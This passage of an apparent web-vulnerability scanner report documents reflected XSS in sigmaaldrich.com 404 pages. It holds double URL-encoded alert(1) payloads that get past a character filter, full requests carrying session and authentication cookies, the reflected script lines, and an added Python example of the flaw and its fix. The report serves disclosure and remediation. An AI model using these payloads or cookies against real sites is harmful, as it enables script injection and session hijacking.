The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f4d4%2522%253balert%25281%2529%252f%252ff7f2f7abc80 was submitted in the REST URL parameter 5. This input was echoed as 3f4d4";alert(1)//f7f2f7abc80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Aldrich/Brochure3f4d4%2522%253balert%25281%2529%252f%252ff7f2f7abc80/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:41 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Aldrich/Brochure3f4d4";alert(1)//f7f2f7abc80/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.283. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba5ea%2522%253balert%25281%2529%252f%252f39be17f4157 was submitted in the REST URL parameter 6. This input was echoed as ba5ea";alert(1)//39be17f4157 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Aldrich/Brochure/ba5ea%2522%253balert%25281%2529%252f%252f39be17f4157/vol3-issue1-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:44 GMT
Content-Length: 28966
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Aldrich/Brochure/ba5ea";alert(1)//39be17f4157/vol3-issue1-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.284. http://www.sigmaaldrich.com/etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12cd0%2522%253balert%25281%2529%252f%252f3d9dad51fca was submitted in the REST URL parameter 1. This input was echoed as 12cd0";alert(1)//3d9dad51fca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc12cd0%2522%253balert%25281%2529%252f%252f3d9dad51fca/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:57 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc12cd0";alert(1)//3d9dad51fca/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf","E404") ;
   </script>
...[SNIP]...
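
Findings 1.279 to 1.285 in this section share one mechanism: the web server decodes the request path once, a character check runs on that once-decoded value, the application decodes it a second time, and the result is concatenated into the first string argument of cmCreateErrorTag() in the 404 page. The Python script below is an added example written for this report page; it is not code from the Burp report or from the sigmaaldrich.com site. The blacklist filter, the second unquote() call and all function names are assumptions that reproduce the observed behaviour; the request target and the reflected script line are taken verbatim from finding 1.279. It rebuilds the reflected line from the double-encoded path, shows the single-encoded form being blocked, and gives a hardened version that decodes exactly once and encodes the value for a JavaScript string context, plus a check that tells an intact literal from a broken-out one in a captured response.

```python
"""Double URL-decode into a JavaScript string context (findings 1.279-1.285).

Added example, not code from the Burp report or from sigmaaldrich.com.
Assumed: the blacklist, the second decode and the function names.
Taken from finding 1.279: the request target and the reflected script line.
"""
import json
import re
from urllib.parse import unquote

ORIGIN = "http://www.sigmaaldrich.com:4402"

# Request target from finding 1.279 (double-encoded payload in REST URL parameter 2).
DOUBLE_ENCODED = ("/etc/medialib98b2b%2522%253balert%25281%2529%252f%252fd06e6a724d2"
                  "/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp"
                  "/vol3-issue1-proteomics.pdf")
# The same payload encoded only once: what a browser sends for a literal '"'.
SINGLE_ENCODED = unquote(DOUBLE_ENCODED)
# Script line the report shows in the 404 response for finding 1.279.
REPORTED_SCRIPT_LINE = (
    'cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib98b2b";'
    'alert(1)//d06e6a724d2/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp'
    '/vol3-issue1-proteomics.pdf","E404") ;'
)


def naive_filter_allows(value: str) -> bool:
    """Assumed blacklist: rejects the usual XSS metacharacters when present as literals."""
    return re.search(r'["\'<>\\]', value) is None


def render_error_tag_vulnerable(request_target: str):
    """Reproduces the reported chain. Returns None when the filter blocks the request."""
    once = unquote(request_target)        # web server's single decode: %2522 -> %22
    if not naive_filter_allows(once):     # the check only ever sees the once-decoded value
        return None
    twice = unquote(once)                 # application decodes again: %22 -> "
    return 'cmCreateErrorTag("Error 404 | ' + ORIGIN + twice + '","E404") ;'


def js_string_literal(value: str) -> str:
    """Encode a value as a JavaScript string literal for use inside a <script> block.

    json.dumps escapes the double quote and the backslash; <, >, & and the two
    JavaScript line terminators are escaped as well, so the value can neither
    end the literal nor close the script element."""
    out = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                    ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        out = out.replace(ch, esc)
    return out


def render_error_tag_fixed(request_target: str) -> str:
    """Hardened version: canonicalise exactly once, then encode for the output context."""
    path = unquote(request_target)        # one decode only; %2522 stays as %22
    return ("cmCreateErrorTag(" + js_string_literal("Error 404 | " + ORIGIN + path)
            + ',"E404") ;')


INTACT_RE = re.compile(r'cmCreateErrorTag\("((?:[^"\\]|\\.)*)","E404"\) ;')


def string_literal_intact(script_line: str) -> bool:
    """Check for a captured response line: True only when the first argument is
    still one well-formed double-quoted literal (no unescaped quote inside it)."""
    return INTACT_RE.fullmatch(script_line) is not None


if __name__ == "__main__":
    print(render_error_tag_vulnerable(DOUBLE_ENCODED) == REPORTED_SCRIPT_LINE)   # True
    print(render_error_tag_vulnerable(SINGLE_ENCODED))                           # None
    print(render_error_tag_fixed(SINGLE_ENCODED))
```

The hardened renderer does not need the blacklist at all: once the value is decoded a single time and encoded for the JavaScript string context, a quote in the path arrives in the page as \" and the literal stays closed. Any validation the application still wants to apply to the path should run on that once-decoded value, as the remediation text above recommends.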

1.285. http://www.sigmaaldrich.com/etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f759%2522%253balert%25281%2529%252f%252f8ff37a78655 was submitted in the REST URL parameter 2. This input was echoed as 1f759";alert(1)//8ff37a78655 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib1f759%2522%253balert%25281%2529%252f%252f8ff37a78655/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:06 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib1f759";alert(1)//8ff37a78655/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf","E404") ;
   </script>
...[SNIP]...

1.286. http://www.sigmaaldrich.com/etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55a88%2522%253balert%25281%2529%252f%252fb19bddf449c was submitted in the REST URL parameter 3. This input was echoed as 55a88";alert(1)//b19bddf449c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs55a88%2522%253balert%25281%2529%252f%252fb19bddf449c/Fluka/Brochure/1/analytix4_2009.Par.0001.File.tmp/analytix4_2009.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
